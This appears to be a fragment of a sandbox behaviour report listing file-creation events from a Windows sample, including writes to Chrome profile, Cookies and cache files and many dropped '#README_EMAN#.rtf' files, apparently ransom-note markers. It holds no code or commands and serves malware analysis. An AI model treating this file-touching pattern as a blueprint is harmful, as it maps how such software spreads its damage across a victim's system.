| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\main.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG.old | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\manifest.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\en_GB\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\hu\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\pl\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\tr\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\main.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\en_US\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_metadata\computed_hashes.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000011 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\es\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\9D76938C-943D-439F-A135-26D02821EE05\x-none.16\stream.x64.x-none.man.dat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000002 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\id\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\el\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\ProgramData\Package Cache\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\packages\vcRuntimeMinimum_x86\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\pt_BR\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\uk\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\it\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001c | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\he\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\elog_460F9943EA70F103.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ca\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\pt_PT\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000c | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\tzdb.dat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\vi\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\bad_460F9943EA70F103.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ms\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000016 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\packages\vcRuntimeAdditional_x86\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\icon_128.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\sr\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cookies | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\de\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\eu\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\ProgramData\Package Cache\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\packages\vcRuntimeAdditional_amd64\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\x-none.16\s640.hash | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{e52a6842-b0ac-476e-b48f-378a97a67346}\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\ar\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\manifest.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\en-US\Journal.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\Graph.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Mail\wab.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\58.0.3029.110.manifest | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ja\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ro\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\he\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fi\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\MANIFEST-000001 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\default_apps\youtube.crx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\es_419\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\zh_CN\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\de\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hu\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\pt_BR\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\uk\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\ar\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\nl\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\User Account Pictures\guest.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\es_419\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\ja\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\sv\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\ro\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\regid.1991-06.com.microsoft\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000014 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Windows Live\WLive48x48.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\USOShared\Logs\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\8C296B8E-6699-457C-9415-3D0647E1D775\en-us.16\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\8C296B8E-6699-457C-9415-3D0647E1D775\x-none.16\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\9D76938C-943D-439F-A135-26D02821EE05\en-us.16\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\9D76938C-943D-439F-A135-26D02821EE05\x-none.16\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\EDA58A0B-AD79-496A-8530-618D08767E60\en-us.16\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\EDA58A0B-AD79-496A-8530-618D08767E60\x-none.16\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\en-us.16\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\x-none.16\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ko\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\zh_CN\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\ja\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\ar\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\bad_460F9943EA70F103.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\elog_460F9943EA70F103.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\vc_runtimeMinimum_x86.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\vc_runtimeMinimum_x86.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{e52a6842-b0ac-476e-b48f-378a97a67346}\VC_redist.x64.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
